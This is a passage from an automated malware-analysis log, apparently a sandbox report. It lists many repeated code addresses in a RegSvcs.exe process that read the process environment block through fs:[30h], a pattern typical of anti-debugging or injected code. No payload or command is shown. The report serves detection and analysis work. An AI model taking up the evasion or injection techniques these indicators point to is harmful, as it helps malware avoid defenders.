          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A14015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0195B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0195B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0195B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0195B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01960050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01960050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A02073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A11074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01972397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A15BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01951B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01951B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019FD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A0138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01974BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01974BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01974BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0196DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A0131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0194F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0194DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01973B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01973B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0194DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A18B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0195AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0195AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01972ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01972AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0194AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0194AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01945210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01945210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01945210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01945210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01963A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01958A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01984A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01984A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A18A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019D4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01949240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01949240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01949240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01949240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0198927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019FB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019FB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01972581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01972581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01972581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01972581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01942D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01942D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01942D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01942D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01942D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01971DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01971DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01971DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019735A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019F8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0195D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0195D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A18D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0194AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019CA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01974D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01974D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01974D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01967D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01983D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0196C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0196C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0195849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A014FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A18CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A1740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A1740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A1740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019DC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019DC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0196746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01958794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019837F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0196F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019DFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019DFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A1070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A1070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01944F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01944F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A18F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0195EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0195FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A10EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A10EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A10EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019DFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019736CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019FFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01988EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019716E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A18ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019576E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0194C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0194C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0194C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01978E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019FFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0194E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01957E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01957E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01957E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01957E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01957E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01957E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0196AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0196AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0196AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0196AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0196AE73 mov eax, dword ptr fs:[00000030h]
